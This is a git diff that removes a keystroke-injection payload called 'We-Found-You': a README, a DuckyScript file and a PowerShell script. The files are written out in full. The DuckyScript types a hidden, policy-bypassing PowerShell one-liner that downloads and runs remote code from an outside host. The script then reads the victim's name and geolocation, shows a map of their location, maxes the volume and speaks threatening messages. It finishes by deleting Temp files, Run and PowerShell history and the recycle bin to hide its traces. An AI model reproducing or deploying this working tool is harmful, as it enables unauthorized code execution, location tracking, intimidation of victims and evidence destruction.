diff --git a/Payloads/Flip-We-Found-You/README.md b/Payloads/Flip-We-Found-You/README.md deleted file mode 100644 index 010b557..0000000 --- a/Payloads/Flip-We-Found-You/README.md +++ /dev/null @@ -1,114 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# We-Found-You - -This script is ready to run as is. Just download and execute with the provided link. - -## Description - -This script will get the GeoLocation (Latitude and Longitude) of your target. -Then a page will open in their browser with a map of their current location on it. -Their system volume will be turned to max level. -SAPI speak with talk through their speakers the message provided or a custom one you provide. - -![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-We-Found-You/location.jpg) - -## Getting Started - -### Dependencies - -* Windows 10,11 -* Their location services are turned on - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Golang - -
Instagram - 		- - Jsonnet - -
Discord - 		- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

diff --git a/Payloads/Flip-We-Found-You/We-Found-You.txt b/Payloads/Flip-We-Found-You/We-Found-You.txt deleted file mode 100644 index 4718610..0000000 --- a/Payloads/Flip-We-Found-You/We-Found-You.txt +++ /dev/null @@ -1,16 +0,0 @@ -REM Title: We-Found-You - -REM Author: I am Jakoby - -REM Description: This payload is meant to open a map in your target's web browser with their current location. - -REM Target: Windows 10, 11 - -REM -------------------------------------------------------------------------------------- -REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. -REM -------------------------------------------------------------------------------------- - -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex -ENTER diff --git a/Payloads/Flip-We-Found-You/found-you.ps1 b/Payloads/Flip-We-Found-You/found-you.ps1 deleted file mode 100644 index c4be40e..0000000 --- a/Payloads/Flip-We-Found-You/found-you.ps1 +++ /dev/null @@ -1,177 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.NOTES - The target's Location Services must be turned on or this payload will not work. - -.SYNOPSIS - This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are. - -.DESCRIPTION - This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account. - The SSID and WiFi password of any current or previously connected to networks. - It determines the last day they changed their password and how many days ago. - Once the information is gathered, the script will pause until a mouse movement is detected. - Then the script uses Sapi speak to roast their set up and lack of security. -#> - -#----------------------------------------------------------------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to get the name associated with the targets Microsoft account, if not detected UserName will be used. -#> - -function Get-fullName { - - try { - - $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") - - } - - # If no name is detected function will return $env:UserName - - # Write Error is just for troubleshooting - catch {Write-Error "No name was detected" - return $env:UserName - -ErrorAction SilentlyContinue - } - - return $fullName - -} - -$FN = Get-fullName - -#----------------------------------------------------------------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to get the current Latitude and Longitude of your target -#> - -function Get-GeoLocation{ - try { - Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace - $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object - $GeoWatcher.Start() #Begin resolving current locaton - - while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { - Start-Sleep -Milliseconds 100 #Wait for discovery. - } - - if ($GeoWatcher.Permission -eq 'Denied'){ - Write-Error 'Access Denied for Location Information' - } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results. - - } - } - # Write Error is just for troubleshooting - catch {Write-Error "No coordinates found" - return "No Coordinates found" - -ErrorAction SilentlyContinue - } - -} - -#----------------------------------------------------------------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to pause the script until a mouse movement is detected -#> - -function Pause-Script{ -Add-Type -AssemblyName System.Windows.Forms -$originalPOS = [System.Windows.Forms.Cursor]::Position.X -$o=New-Object -ComObject WScript.Shell - - while (1) { - $pauseTime = 3 - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ - break - } - else { - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime - } - } -} - -#----------------------------------------------------------------------------------------------------------------------------------------------------------- - -$GL = Get-GeoLocation - -$GL = $GL -split " " - -$Lat = $GL[0].Substring(11) -replace ".$" - -$Lon = $GL[1].Substring(10) -replace ".$" - -Pause-Script - -# Opens their browser with a map of their current location - -Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon" - -Start-Sleep -s 3 - -# Sets Volume to max level - -$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)} - -# Sets up speech module - -$s=New-Object -ComObject SAPI.SpVoice -$s.Rate = -2 -$s.Speak("We found you $FN") -$s.Speak("We know where you are") -$s.Speak("We are everywhere") -$s.Speak("We do not forgive, we do not forget") -$s.Speak("Expect us") - - -#----------------------------------------------------------------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/Payloads/Flip-We-Found-You/location.jpg b/Payloads/Flip-We-Found-You/location.jpg deleted file mode 100644 index 7b6e943..0000000 Binary files a/Payloads/Flip-We-Found-You/location.jpg and /dev/null differ